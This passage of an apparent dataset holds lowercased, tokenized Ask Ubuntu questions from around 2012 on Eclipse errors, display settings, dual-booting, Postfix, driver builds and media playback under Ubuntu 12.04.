partrenderingengine.java:675 ) at org.eclipse.e4.ui.workbench.renderers.swt.swtpartrenderer.processcontents ( swtpartrenderer.java:59 ) at org.eclipse.e4.ui.internal.workbench.swt.partrenderingengine.safecreategui ( partrenderingengine.java:635 ) at org.eclipse.e4.ui.internal.workbench.swt.partrenderingengine.safecreategui ( partrenderingengine.java:725 ) at org.eclipse.e4.ui.internal.workbench.swt.partrenderingengine.access $ 2 ( partrenderingengine.java:696 ) at org.eclipse.e4.ui.internal.workbench.swt.partrenderingengine $ 7.run ( partrenderingengine.java:690 ) at org.eclipse.core.runtime.saferunner.run ( saferunner.java:42 ) at org.eclipse.e4.ui.internal.workbench.swt.partrenderingengine.creategui ( partrenderingengine.java:675 ) at org.eclipse.e4.ui.workbench.renderers.swt.swtpartrenderer.processcontents ( swtpartrenderer.java:59 ) at org.eclipse.e4.ui.workbench.renderers.swt.perspectiverenderer.processcontents ( perspectiverenderer.java:59 ) at org.eclipse.e4.ui.internal.workbench.swt.partrenderingengine.safecreategui ( partrenderingengine.java:635 ) at org.eclipse.e4.ui.internal.workbench.swt.partrenderingengine.safecreategui ( partrenderingengine.java:725 ) at org.eclipse.e4.ui.internal.workbench.swt.partrenderingengine.access $ 2 ( partrenderingengine.java:696 ) at org.eclipse.e4.ui.internal.workbench.swt.partrenderingengine $ 7.run ( partrenderingengine.java:690 ) at org.eclipse.core.runtime.saferunner.run ( saferunner.java:42 ) at org.eclipse.e4.ui.internal.workbench.swt.partrenderingengine.creategui ( partrenderingengine.java:675 ) at org.eclipse.e4.ui.workbench.renderers.swt.perspectivestackrenderer.showtab ( perspectivestackrenderer.java:103 ) at org.eclipse.e4.ui.workbench.renderers.swt.lazystackrenderer $ 1.handleevent ( lazystackrenderer.java:67 ) at org.eclipse.e4.ui.services.internal.events.uieventhandler $ 1.run ( uieventhandler.java:41 ) at org.eclipse.swt.widgets.synchronizer.syncexec ( synchronizer.java:180 ) at org.eclipse.ui.internal.uisynchronizer.syncexec ( uisynchronizer.java:150 ) at org.eclipse.swt.widgets.display.syncexec ( display.java:4291 ) at org.eclipse.e4.ui.internal.workbench.swt.e4application $ 1.syncexec ( e4application.java:187 ) at org.eclipse.e4.ui.services.internal.events.uieventhandler.handleevent ( uieventhandler.java:38 ) at org.eclipse.equinox.internal.event.eventhandlerwrapper.handleevent ( eventhandlerwrapper.java:197 ) at org.eclipse.equinox.internal.event.eventhandlertracker.dispatchevent ( eventhandlertracker.java:197 ) at org.eclipse.equinox.internal.event.eventhandlertracker.dispatchevent ( eventhandlertracker.java:1 ) at org.eclipse.osgi.framework.eventmgr.eventmanager.dispatchevent ( eventmanager.java:230 ) at org.eclipse.osgi.framework.eventmgr.listenerqueue.dispatcheventsynchronous ( listenerqueue.java:148 ) at org.eclipse.equinox.internal.event.eventadminimpl.dispatchevent ( eventadminimpl.java:135 ) at org.eclipse.equinox.internal.event.eventadminimpl.sendevent ( eventadminimpl.java:78 ) at org.eclipse.equinox.internal.event.eventcomponent.sendevent ( eventcomponent.java:39 ) at org.eclipse.e4.ui.services.internal.events.eventbroker.send ( eventbroker.java:81 ) at org.eclipse.e4.ui.internal.workbench.uieventpublisher.notifychanged ( uieventpublisher.java:57 ) at org.eclipse.emf.common.notify.impl.basicnotifierimpl.enotify ( basicnotifierimpl.java:374 ) at org.eclipse.e4.ui.model.application.ui.advanced.impl.perspectivestackimpl.setselectedelement ( perspectivestackimpl.java:135 ) at org.eclipse.e4.ui.model.application.ui.advanced.impl.perspectivestackimpl.setselectedelement ( perspectivestackimpl.java:1 ) at org.eclipse.e4.ui.workbench.addons.perspectiveswitcher.perspectiveswitcher $ 13.widgetselected ( perspectiveswitcher.java:436 ) at org.eclipse.swt.widgets.typedlistener.handleevent ( typedlistener.java:248 ) at org.eclipse.swt.widgets.eventtable.sendevent ( eventtable.java:84 ) at org.eclipse.swt.widgets.widget.sendevent ( widget.java:1276 ) at org.eclipse.swt.widgets.display.rundeferredevents ( display.java:3554 ) at org.eclipse.swt.widgets.display.readanddispatch ( display.java:3179 ) at org.eclipse.e4.ui.internal.workbench.swt.partrenderingengine $ 9.run ( partrenderingengine.java:1022 ) at org.eclipse.core.databinding.observable.realm.runwithdefault ( realm.java:332 ) at org.eclipse.e4.ui.internal.workbench.swt.partrenderingengine.run ( partrenderingengine.java:916 ) at org.eclipse.e4.ui.internal.workbench.e4workbench.createandrunui ( e4workbench.java:86 ) at org.eclipse.ui.internal.workbench $ 5.run ( workbench.java:585 ) at org.eclipse.core.databinding.observable.realm.runwithdefault ( realm.java:332 ) at org.eclipse.ui.internal.workbench.createandrunworkbench ( workbench.java:540 ) at org.eclipse.ui.platformui.createandrunworkbench ( platformui.java:149 ) at org.eclipse.ui.internal.ide.application.ideapplication.start ( ideapplication.java:124 ) at org.eclipse.equinox.internal.app.eclipseapphandle.run ( eclipseapphandle.java:196 ) at org.eclipse.core.runtime.internal.adaptor.eclipseapplauncher.runapplication ( eclipseapplauncher.java:110 ) at org.eclipse.core.runtime.internal.adaptor.eclipseapplauncher.start ( eclipseapplauncher.java:79 ) at org.eclipse.core.runtime.adaptor.eclipsestarter.run ( eclipsestarter.java:353 ) at org.eclipse.core.runtime.adaptor.eclipsestarter.run ( eclipsestarter.java:180 ) at sun.reflect.nativemethodaccessorimpl.invoke0 ( native method ) at sun.reflect.nativemethodaccessorimpl.invoke ( nativemethodaccessorimpl.java:39 ) at sun.reflect.delegatingmethodaccessorimpl.invoke ( delegatingmethodaccessorimpl.java:25 ) at java.lang.reflect.method.invoke ( method.java:597 ) at org.eclipse.equinox.launcher.main.invokeframework ( main.java:629 ) at org.eclipse.equinox.launcher.main.basicrun ( main.java:584 ) at org.eclipse.equinox.launcher.main.run ( main.java:1438 ) ! session 2012-08-25 14:48:17.623 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - eclipse.buildid=i20120608-1400 java.version=1.6.0_34 java.vendor=sun microsystems inc. bootloader constants : os=linux , arch=x86 , ws=gtk , nl=en_us framework arguments : -product org.eclipse.epp.package.jee.product command-line arguments : -os linux -ws gtk -arch x86 -product org.eclipse.epp.package.jee.product i did hours of google searching , seeing all different solutions , but they are either too complicated for me to figure out see this , or not work at all . i tried the following : edit /etc/environment and add mozilla_five_home=/usr/lib/firefox , no effect edit eclipse.desktop and change exec=/usr/bin/eclipse/eclipse to exec=env mozilla_five_home=/usr/lib/firefox /usr/bin/eclipse/eclipse this time the eclipse will freeze at the start-up . download a xulrunner-1.9.2.19 from here and set the mozilla_five_home env variable point to directory where i extract it . i got a new error : entry org.eclipse.datatools.sqltools.plan 4 0 2012-08-25 14:48:25.509 ! entry org.eclipse.datatools.sqltools.plan 4 0 2012-08-25 14:48:25.509 ! message no resource bundle has been set for the loggerno more handles [ mozilla_five_home='/usr/lib/mozilla-1.9.2 ' ] ( java.lang.unsatisfiedlinkerror : could not load swt library . reasons : /usr/bin/eclipse/configuration/org.eclipse.osgi/bundles/626/2/.cp/libswt-mozilla-gtk-4233.so : libxpcom.so : can not open shared object file : no such file or directory no swt-mozilla-gtk in java.library.path ca n't load library : /home/simon/.swt/lib/linux/x86/libswt-mozilla-gtk-4233.so ca n't load library : /home/simon/.swt/lib/linux/x86/libswt-mozilla-gtk.so /home/simon/.swt/lib/linux/x86/libswt-mozilla-gtk-4233.so : libxpcom.so : can not open shared object file : no such file or directory ) '' . ! entry org.eclipse.datatools.sqltools.plan 4 0 2012-08-25 14:48:25.513 ! message no more handles [ mozilla_five_home='/usr/lib/mozilla-1.9.2 ' ] ( java.lang.unsatisfiedlinkerror : could not load swt library . reasons : /usr/bin/eclipse/configuration/org.eclipse.osgi/bundles/626/2/.cp/libswt-mozilla-gtk-4233.so : libxpcom.so : can not open shared object file : no such file or directory no swt-mozilla-gtk in java.library.path ca n't load library : /home/simon/.swt/lib/linux/x86/libswt-mozilla-gtk-4233.so ca n't load library : /home/simon/.swt/lib/linux/x86/libswt-mozilla-gtk.so /home/simon/.swt/lib/linux/x86/libswt-mozilla-gtk-4233.so : libxpcom.so : can not open shared object file : no such file or directory ) possible args : { 0 } , { 1 } , { 2 } , { 3 } ! stack 0 org.eclipse.swt.swterror : no more handles [ mozilla_five_home='/usr/lib/mozilla-1.9.2 ' ] ( java.lang.unsatisfiedlinkerror : could not load swt library . reasons : /usr/bin/eclipse/configuration/org.eclipse.osgi/bundles/626/2/.cp/libswt-mozilla-gtk-4233.so : libxpcom.so : can not open shared object file : no such file or directory no swt-mozilla-gtk in java.library.path ca n't load library : /home/simon/.swt/lib/linux/x86/libswt-mozilla-gtk-4233.so ca n't load library : /home/simon/.swt/lib/linux/x86/libswt-mozilla-gtk.so /home/simon/.swt/lib/linux/x86/libswt-mozilla-gtk-4233.so : libxpcom.so : can not open shared object file : no such file or directory ) at org.eclipse.swt.swt.error ( swt.java:4387 ) at org.eclipse.swt.browser.mozilla.initmozilla ( mozilla.java:1970 ) ... and then the super long stacktrace could anyone please help me figure out how to solve this problem . thanks .
180450	how do i change the amount by which the brightness increases or decreases ?	when i press fn + f6 , the brightness increases . lets say the brightness increases by 1 unit . how do i make it increase by 0.5 units ? i hope you understand my question . i 'm running ubuntu 12.04 32 bit . if thats important .
180456	monitor and ubuntu screen resolution do n't match	few days ago i manage to have 1366x768 resolution option in my ubuntu 12.04 ( nvidia x driver ) , but the screen ( fiscal ) and the option resolution in the system settings under monitor , does n't match each other , i have chosen 1366x768 as the option , but seems that in the screen its just show 1280x768 this is the image : on the right hand side is nvidia x setting and the left is monitor resolution . should both be on the same setting or does n't it matter ? should i only focus on the setting that is reflecting in ubuntu 12.04 by the system setting monitor ? what about the refresh rate , does that play a role to improve the viewing and my driver for my graphics ?
180459	wubi grub prompt `` minimal bash-like line editing is supported ''	i just installed ubuntu today with wubi . after installing , the first time i tried to boot it , it gave me a screen with this grub prompt : minimal bash-like line editing is supported . for the first word , tab lists possible command completions . anywhere else tab lists possible device or file completions . grub > i tried repeatedly to reboot , and no luck . what it wrong ? thanks , jt
180469	`` sudo apt-get update '' misleading error message	i get following error while issuing the command sudo apt-get update reading package lists ... done w : duplicate sources.list entry http : //archive.canonical.com/ubuntu/ precise/partner i386 packages ( /var/lib/apt/lists/archive.canonical.com_ubuntu_dists_precise_partner_binary-i386_packages ) w : you may want to run apt-get update to correct these problems i have seen several such post on this site like : one two i do get the solution for this problem i.e . to remove the duplicate entry , but my question is why to display the message as w : you may want to run apt-get update to correct these problems when this error has occurred on running the same command . does n't anyone see this as redundant or misleading ? i want to know where to record such things so that they get fixed . is there any issue tracking system for ubuntu , where i can add this as a ticket . note i had heard that askubuntu.com is now the official site for ubuntu support . is this correct ?
180477	how to partition hdd and dual boot ubuntu with windows 7 ( first installed win7 )	hello'world ' ! i am coming from another planet ( windows planet ) but i 'm friendly and i hope you are also ! ? ! i recently bought a new hardware ( a laptop ) because i got accepted at a good computer science university in my country . i also heard that we 're going to study linux alot so i thought why not getting started with it . i tryed some virtualization in windows for kubuntu 8.x ( an older version ) and now ubuntu 12.04 . for a few days now i 'm getting more into linux , and i decided to not just use it in virtualbox . so i kept on this new machine , when i partitioned it , some unallocated/free space ( as you see from the screenshot ) to install ubuntu on it . ( note that i allocated for other partitions the exact size that i wanted by using 1gb=1024 mb -joke : ) ) . http : //s17.postimage.org/kr0mtkhfz/capture.png now , even though i 'm a tourist here , i managed to do a live usb for ubuntu and some additional repair tools on it if necessary . but when it comes to how to partition the 100.66 gb left i 'm blocked out . here 's what i want to have : a partition with ubuntu installed - which i want to make it primary ( the forth and last one i can ) but i do n't know how much space should i use ( for windows 7 on c : i kept 50 giga ) the required partition for system repair or ubuntu creates this automatically ? the swap partition and size more or even 4 gb ram , should i go more than 4 gb ? windows 's page file is bigger but i wanted to shrink it anyway the partition where to keep most user files/games/kits i do n't remind exactly but is this called home/ partition ? should i make it fat32 so i can make this a `` shared with win partition '' ? oh my god when did i wrote so much text ? ! ? ! ... please , if you 're still here , tell me your opinion about how should i allocate the free space considering what i said before
180478	can not send mail to localhost with postfix : temporary lookup failure	i removed postfix , tried apache james , removed james , and now can not get postfix working again : to my knowledge , i 'm using postfix correctly as so : thufir @ dur : ~ $ thufir @ dur : ~ $ telnet localhost 25 trying 127.0.0.1 ... connected to localhost . escape character is '^ ] ' . 220 dur.bounceme.net esmtp postfix ( ubuntu ) ehlo test 250-dur.bounceme.net 250-pipelining 250-size 10240000 250-vrfy 250-etrn 250-starttls 250-enhancedstatuscodes 250-8bitmime 250 dsn quit 221 2.0.0 bye connection closed by foreign host . thufir @ dur : ~ $ possibly the problem is that sendmail is n't working : thufir @ dur : ~ $ thufir @ dur : ~ $ postfix sendmail postfix : error : to submit mail , use the postfix sendmail command postfix : fatal : the postfix command is reserved for the superuser thufir @ dur : ~ $ thufir @ dur : ~ $ sudo postfix sendmail postfix/postfix-script : error : unknown command : 'sendmail' postfix/postfix-script : fatal : usage : postfix start ( or stop , reload , abort , flush , check , status , set-permissions , upgrade-configuration ) thufir @ dur : ~ $ telnet gives : thufir @ dur : ~ $ thufir @ dur : ~ $ telnet localhost 25 trying 127.0.0.1 ... connected to localhost . escape character is '^ ] ' . 220 dur.bounceme.net esmtp postfix ( ubuntu ) helo localhost 250 dur.bounceme.net mail from : thufir @ localhost 250 2.1.0 ok rcpt to : thufir @ localhost 451 4.3.0 < thufir @ localhost > : temporary lookup failure quit 221 2.0.0 bye connection closed by foreign host . thufir @ dur : ~ $ which definitely seems intriguing .
180481	issue while installing ubuntu 12.04.1 .	i am trying to install ubuntu 12.04.1 through a usb stick following the instructions ( which ones ? ) but i am stuck at the second step because i do not know what dash is to search for the startup disk creator . could someone explain to me what dash is and how can i find it ?
180490	how to make annotations on .pdf files like on okular , but without using okular ? what .pdf viewer should i use ?	so guys , i 'm answering some question from a school test ( saved in .pdf ) and i would like to do it like i did once on okular , using a cursor-pen to mark the alternatives . like on this screenshot from okular official website . as you can see , he traced the title with a cursor-pen , this is what i want to do . and i 'm using ubuntu 11.10 not kubuntu .
180504	how can i remove all build dependencies for a particular package ?	when i want to compile something from source in ubuntu/debian , i usually get build-dependencies by running `` sudo apt-get build-dep package_name '' in the terminal . they are ( usually ) useless once the compilation job is done . so , how do i remove all build-dependencies for a particular package ?
180511	why ca n't i play hd flash videos in firefox ?	i have a asus u32u-rx128v laptop , it is great . i installed ubuntu 12.04 and nearly everything works i had many difficulties to install the video card drivers display : :0 screen : 0 opengl vendor string : advanced micro devices , inc. opengl renderer string : amd radeon hd 6320 graphics opengl version string : 4.2.11762 compatibility profile context libva : va-api version 0.32.0 libva : user requested driver 'xvba' libva : trying to open /usr/lib/va/drivers/xvba_drv_video.so libva : va_opendriver ( ) returns 0 vainfo : va-api version : 0.32 ( libva 1.0.15 ) vainfo : driver version : splitted-desktop systems xvba backend for va-api - 0.7.8 vainfo : supported profile and entrypoints vaprofileh264high : vaentrypointvld vaprofilevc1advanced : vaentrypointvld my laptopt is able to play a full hd movie ( 1920*1080 ) on a tv but is not able to play videos in firefox i tried html5 rather than flash , its worse ! i tried greasmonkey and viewtube , videos do n't play at all or lag a lot . what option do i have ? windows allows me to play hd videos in firefox with no lag , so ubuntu should be able to do the same ... thanks !
180512	wireless issues in 12.04 with ralink rt3060 card	i have a fresh install of ubuntu 12.04 32 bit on a desktop with an airlink 101 awlh5075 pci wireless card ( i think the chipset is ralink rt3060 ) . i can connect to the network ( wpa2 secured ) no problem , but i have no internet access while connected . i ran the lshw -c networking command , but got no return . when i ping the router it returns with just ping 192.168.2.1 ( 192.168.2.1 ) 56 ( 84 ) bytes of data and nothing else . any help ?
180513	connecting laptop to a tv and use mirror screen	my old hp pavilion is running 12.04 . i want to be able to connect it to the smart tv at home , it 's from philips , in case you wan na know . anyways , i use a vga cable to connect it to the tv , then i go into ubuntu system settings . there i turn the tv on and it displays a ubuntu desktop on the tv . however , i want it to show the same screen . i chose to have mirror screens , it works , but after a few seconds ( 5-10 ) , it goes back to the setting it was before , even if i execute it . this is very annoying . do anyone know what the problem can be ? i 've used different resolutions , but it does n't help .
180520	ca n't install ubuntu alongside windows 7 because it says i have multiple operating systems	i am completely new to ubuntu but am looking forward to giving it a shot . i downloaded 12.04 64-bit and burned it to a dvd . booted my laptop from the dvd and tried to install it alongside windows 7 64-bit , but it says that my laptop has multiple os and it only gives me the option to either erase the disk and install or the advanced install . as far as i know the only os i have is windows 7 64-bit . has this happened to anyone else ? is there a way to fix this ?
180530	different icons on different workspaces	when i install an icon on one workspace it is installed on all four workspaces . is it possible to install different icons on different workspaces ? i am using ubuntu 12.04 .
180532	correct display configuration . errors while trying to arrange displays	i am trying to set up my tv with my laptop trough a vga cable . the display application in ubuntu throws a lot of errors to me and i have given up in trying to do it myself . i try to apply the 1920 1080 display . the selected configuration for displays could not be applied requested size ( 3200 , 1080 ) exceeds 3d hardware limit ( 2048 , 2048 ) . you must either rearrange the displays so that they fit within a ( 2048 , 2048 ) square or select the ubuntu 2d session at login . and also this : failed to apply configuration : % s gdbus.error : org.gtk.gdbus.unmappedgerror.quark._gnome_2drr_2derror_2dquark.code3 : requested size ( 3200 , 1080 ) exceeds 3d hardware limit ( 2048 , 2048 ) . you must either rearrange the displays so that they fit within a ( 2048 , 2048 ) square or select the ubuntu 2d session at login . please help . @ leozitop no i do n't see anything when connected to 1920 1080 because the setup fails before actually applying . yes there are other resolutions which do work . i believe the problem has something to do with the rotation it is set up . my ubuntu display application has only clockwise and counterclockwise options for the tv display . i really do n't know why this is happening . basic procedure : plug in cable , did not get the resolution i wanted . changed settings , applied them . re-peat until desired display is shown . i 'm not a computer illiterate , really it baffles me that this is happening . output of xrandr : david @ lapubuntu : ~ $ xrandr screen 0 : minimum 320 x 200 , current 1880 x 800 , maximum 4096 x 4096 lvds1 connected 1280x800+0+0 ( normal left inverted right x axis y axis ) 331mm x 207mm 1280x800 60.0*+ 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 connected 600x800+1280+0 left ( normal left inverted right x axis y axis ) 1600mm x 900mm 1920x1080 60.0 + 1280x1024 60.0 1360x768 60.0 1280x720 60.0 1024x768 60.0 800x600 60.3* 640x480 60.0 tv1 unknown connection ( normal left inverted right x axis y axis ) 848x480 59.9 + 640x480 59.9 + 1024x768 59.9 800x600 59.9 note that vga says left and indeed it is , but no other option was available in the display . also , note the tv1 unknown connection which i have no idea what it is . note , also , that this has nothing to do with the display since w7 on the computer works fine and since while boot up , and also , before starting session in ubuntu the rotation is normal . i 'll also mention that i have re-installed ubuntu since i had posted this question from a live cd of 12.04 lts . and that before the posting of the question also using 12.04 before another backup that i had to do , the vga setup was fine without any problems .
180533	system requirements for ubuntu 12.04.1 32bit ?	my pc is running windows 7 [ 32bit ] and i was wondering if my system will support the latest ubuntu . my system specifications : *processor : * intel core2 duo cpu e4600 @ 2.4ghz 2.4ghz ram : 1 gb
180540	which players are known to be able or not to be able to play mp4 video in ubuntu 12.04 on toshiba ac100 ( arm )	the answer to this question should help one to choose the player to run in ubuntu 12.04 on toshiba ac100 ( arm ) if one wants to play an mp4 video , like the follwing video : ~ $ mediainfo the\ last\ airbender\ [ ipod\ ] .mp4 general complete name : the last airbender [ ipod ] .mp4 format : mpeg-4 format profile : base media codec id : isom file size : 476 mib duration : 1h 43mn overall bit rate mode : variable overall bit rate : 645 kbps movie name : повелитель стихий performer : the last airbender genre : action & adventure recorded date : 2010 encoded date : utc 2010-11-16 09:45:43 tagged date : utc 2010-11-17 09:50:30 copyright : t.o.x.a cover : yes comment : by rg mobile & rg torrents.ru itunextc : mpaa|pg|200| itunmovi : < ? xml version= '' 1.0 '' encoding= '' utf-8 '' ? > / < ! doctype plist public `` -//apple//dtd plist 1.0//en '' `` http : //www.apple.com/dtds/propertylist-1.0.dtd '' > / < plist version= '' 1.0 '' > / < dict > / < key > cast < /key > / < array > / < dict > / < key > name < /key > / < string > ноа рингер ( aang ) < /string > / < /dict > / < dict > / < key > name < /key > / < string > дев патель ( prince zuko ) < /string > / < /dict > / < dict > / < key > name < /key > / < string > никола пельтц ( katara ) < /string > / < /dict > / < dict > / < key > name < /key > / < string > джексон рэтбоун ( sokka ) < /string > / < /dict > / < dict > / < key > name < /key > / < string > шон тоуб ( uncle iroh ) < /string > / < /dict > / < dict > / < key > name < /key > / < string > аасиф мандви ( commander zhao ) < /string > / < /dict > / < dict > / < key > name < /key > / < string > клифф кёртис ( fire lord ozai ) < /string > / < /dict > / < dict > / < key > name < /key > / < string > сейшелл гэбриел ( princess yue ) < /string > / < /dict > / < dict > / < key > name < /key > / < string > кэтрин хотон ( katara 's grandma ) < /string > / < /dict > / < dict > / < key > name < /key > / < string > френсис гуинан ( master pakku ) < /string > / < /dict > / < dict > / < key > name < /key > / < string > дэймон гаптон ( monk gyatso ) < /string > / < /dict > / < dict > / < key > name < /key > / < string > саммер бишил ( azula ) < /string > / < /dict > / < /array > / < key > directors < /key > / < array > / < dict > / < key > name < /key > / < string > м . найт шьямалан < /string > / < /dict > / < /array > / < key > producers < /key > / < array > / < dict > / < key > name < /key > / < string > скотт аверсано < /string > / < /dict > / < dict > / < key > name < /key > / < string > майкл димартино < /string > / < /dict > / < dict > / < key > name < /key > / < string > кэтлин кеннеди < /string > / < /dict > / < /array > / < key > screenwriters < /key > / < array > / < dict > / < key > name < /key > / < string > м . найт шьямалан < /string > / < /dict > / < /array > / < /dict > / < /plist > ldes : воздушные кочевники , племя воды , царство земли и народ огня . четыре нации были связаны судьбой , когда народ огня начал жестокую войну против всех . прошло сто лет без надежды что-то изменить в этом мире . народ огня почти близок к победе в войне . stik : 0 video id : 1 format : avc format/info : advanced video codec format profile : baseline @ l3.0 format settings , cabac : no format settings , reframes : 6 frames codec id : avc1 codec id/info : advanced video coding duration : 1h 43mn bit rate : 512 kbps maximum bit rate : 2 959 kbps width : 480 pixels height : 200 pixels display aspect ratio : 2.40:1 frame rate mode : constant frame rate : 23.976 fps color space : yuv chroma subsampling : 4:2:0 bit depth : 8 bits scan type : progressive bits/ ( pixel*frame ) : 0.222 stream size : 378 mib ( 79 % ) title : imported with gpac 0.4.6-dev ( build 1 ) writing library : x264 core 92 r1510 33d382a encoding settings : cabac=0 / ref=6 / deblock=1 : -1 : -1 / analyse=0x1:0x111 / me=umh / subme=9 / psy=1 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=16 / chroma_me=1 / trellis=0 / 8x8dct=0 / cqm=0 / deadzone=21,11 / fast_pskip=0 / chroma_qp_offset=-2 / threads=6 / sliced_threads=0 / nr=0 / decimate=1 / interlaced=0 / constrained_intra=0 / bframes=0 / wpredp=0 / keyint=250 / keyint_min=25 / scenecut=40 / intra_refresh=0 / rc_lookahead=60 / rc=2pass / mbtree=1 / bitrate=512 / ratetol=1.0 / qcomp=0.60 / qpmin=10 / qpmax=51 / qpstep=4 / cplxblur=20.0 / qblur=0.5 / ip_ratio=1.40 / aq=1:1.00 encoded date : utc 2010-11-16 09:45:43 tagged date : utc 2010-11-16 09:46:16 audio id : 2 format : aac format/info : advanced audio codec format profile : lc codec id : 40 duration : 1h 43mn bit rate mode : variable bit rate : 128 kbps maximum bit rate : 174 kbps channel ( s ) : 2 channels channel positions : front : l r sampling rate : 48.0 khz compression mode : lossy stream size : 94.4 mib ( 20 % ) encoded date : utc 2010-11-16 09:46:14 tagged date : utc 2010-11-16 09:46:16 ~ $ the default player ( totem ) ca n't play it . for each other player available for ubuntu 12.04 on arm , we need to know whether it can play this kind of video flawlessly . this information will be useful everytime a user wants to play this kind of video and has to select a player that would be working for sure ( not to spend efforts and time to try many players ) .
180544	why is n't this driver install working ( sudo code ) ?	i have a soundcard that i 'd like to use and i 've been trying to install it and being a new ubuntu user , i get about half way through this in the terminal and it stops cooperating with me ... see the link ( soundcard hyperlink ) but basically what i have here : i do the following and it works : sudo apt-get install subversion svn co https : //line6linux.svn.sourceforge.net/svnroot/line6linux change to the directory cd line6linux/driver/trunk time to build from the source but first make sure you have the latest build and headers sudo apt-get install build-essential sudo apt-get install linux-headers then after this point it says must specify file to install . not sure how to do this or what it means . then , running make gives the following output : ./set_revision.sh ./set_revision.sh : 9 : test : https : //line6linux.svn.sourceforge.net/svnroot/line6linux/driver/trunk : unexpected operator make -c /lib/modules/3.2.0-29-generic-pae/build config_line6_usb=m subdirs=/home/nick/line6linux/driver/trunk modules make [ 1 ] : entering directory /usr/src/linux-headers-3.2.0-29-generic-pae ' cc [ m ] /home/nick/line6linux/driver/trunk/audio.o /home/nick/line6linux/driver/trunk/audio.c : in function ‘line6_init_audio’ : /home/nick/line6linux/driver/trunk/audio.c:30:57 : error : ‘this_module’ undeclared ( first use in this function ) /home/nick/line6linux/driver/trunk/audio.c:30:57 : note : each undeclared identifier is reported only once for each function it appears in make [ 2 ] : * [ /home/nick/line6linux/driver/trunk/audio.o ] error 1 make [ 1 ] : * [ module/home/nick/line6linux/driver/trunk ] error 2 make [ 1 ] : leaving directory/usr/src/linux-headers-3.2.0-29-generic-pae ' make : * [ default ] error 2 this is in ubuntu 12.04.1 lts another thing , semi related . cut , copy , paste ? seems like it 's different from program to program . i was in the terminal and hit ctrl-c and then ctrl-shift-v in firefox and it wo n't paste . but in terminal it will paste . i 'm confused . here is what it 's giving me after i hit `` make '' : nick @ nickubuntu : ~/line6linux/driver/trunk $ make ./set_revision.sh ./set_revision.sh : 9 : test : https : //line6linux.svn.sourceforge.net/svnroot/line6linux/driver/trunk : unexpected operator make -c /lib/modules/3.2.0-29-generic-pae/build config_line6_usb=m subdirs=/home/nick/line6linux/driver/trunk modules make [ 1 ] : entering directory /usr/src/linux-headers-3.2.0-29-generic-pae' cc [ m ] /home/nick/line6linux/driver/trunk/audio.o /home/nick/line6linux/driver/trunk/audio.c : in function ‘line6_init_audio’ : /home/nick/line6linux/driver/trunk/audio.c:30:57 : error : ‘this_module’ undeclared ( first use in this function ) /home/nick/line6linux/driver/trunk/audio.c:30:57 : note : each undeclared identifier is reported only once for each function it appears in make [ 2 ] : *** [ /home/nick/line6linux/driver/trunk/audio.o ] error 1 make [ 1 ] : *** [ _module_/home/nick/line6linux/driver/trunk ] error 2 make [ 1 ] : leaving directory/usr/src/linux-headers-3.2.0-29-generic-pae' make : * [ default ] error 2 looks like these folks also had similar problems : http : //ubuntuforums.org/showthread.php ? t=1163608 & page=3
180548	is there a good apparmor profile for virtualbox ?	is there any apparmor profile for virtualbox that works both in normal and guest accounts for 12.04 ? where can i get it ? or maybe its code ? is there any other way to protect my virtualbox from ( black hat crackers ) hacking through malware , trojan , etc , forcing to drop my internet connection inside my virtualbox os xp installed ( infected with virus ) ? outside the virtualbox , it is ok , no problems in host because i use 12.04 , and malware ca n't harm it because it 's a windows virus .
180553	which players are known to be able or not to be able to play dvd saved as a directory on a toshiba ac100 ( arm )	the answer to this question should help one to choose the player to run in ubuntu 12.04 on toshiba ac100 ( arm ) if one wants to play a dvd saved in a directory in the filesystem . the layout of the directory is like this : ../jeeves & wooster_rus poster.jpg 403.51 kb ( 413199 ) side a ( sez1-2 ) 路 4.03 gb video_ts 路 4.03 gb video_ts.bup 12 kb ( 12288 ) video_ts.ifo 12 kb ( 12288 ) video_ts.vob 54 kb ( 55296 ) vts_01_0.bup 300 kb ( 307200 ) vts_01_0.ifo 300 kb ( 307200 ) vts_01_0.vob 112 kb ( 114688 ) vts_01_1.vob 953.76 mb ( 1000097792 ) vts_01_2.vob 953.68 mb ( 1000011776 ) vts_01_3.vob 953.68 mb ( 1000015872 ) vts_01_4.vob 953.76 mb ( 1000099840 ) vts_01_5.vob 318.38 mb ( 333852672 ) side b ( sez3-4 ) 路 4.35 gb video_ts 路 4.35 gb video_ts.bup 12 kb ( 12288 ) video_ts.ifo 12 kb ( 12288 ) video_ts.vob 54 kb ( 55296 ) vts_01_0.bup 320 kb ( 327680 ) vts_01_0.ifo 320 kb ( 327680 ) vts_01_0.vob 114 kb ( 116736 ) vts_01_1.vob 953.73 mb ( 1000058880 ) vts_01_2.vob 953.71 mb ( 1000046592 ) vts_01_3.vob 953.74 mb ( 1000071168 ) vts_01_4.vob 953.65 mb ( 999981056 ) vts_01_5.vob 639.83 mb ( 670914560 ) the individual files with video do not match the `` chapters '' ( episodes ) of the dvd . ( i 've downloaded it from http : //rutracker.org/forum/viewtopic.php ? t=239156 . ) its characteristics are : video codec : divx audio codec : dvd-audio video : 768x576 , 1.85:1 , ntsc , color audio : 48000 hz , 6 channels ( 5.1 surround ) , 96 kbit/sec the default movie player ( totem ) could n't do it . for each other player available for ubuntu 12.04 on arm , we need to know whether it can play this kind of video flawlessly . this information will be useful everytime a user wants to play this kind of video and has to select a player that would be working for sure ( not to spend efforts and time to try many players ) .
180555	eclipse does not want to use openjdk-7	i am on a new installation of ubuntu . i install all the updates , and then restart . i then install openjdk-7-jdk from apt , then i restart . then i install eclipse-platform , eclipse-jdt , and eclipse-cdt . i then launch eclipse . when i check the build path for my imported projects it decided that during the eclipse-platform installation to install openjdk-6 . okay , cool . the problem is that i ca n't use openjdk-7 at all . there is no option to use it in the build path library manager . how can i change it so it uses openjdk-7 ? i tried reinstalling it already , did n't do anything . just told me it was already installed . edit : failed at the title , fixed .
180557	launcher tooltip occasionally goes missing	the tooltip that appears when you mouseover applications in the launcher sometimes goes missing or does n't show the application name correctly . is it possible to repair this problem ? this is the screenshot of my problem .
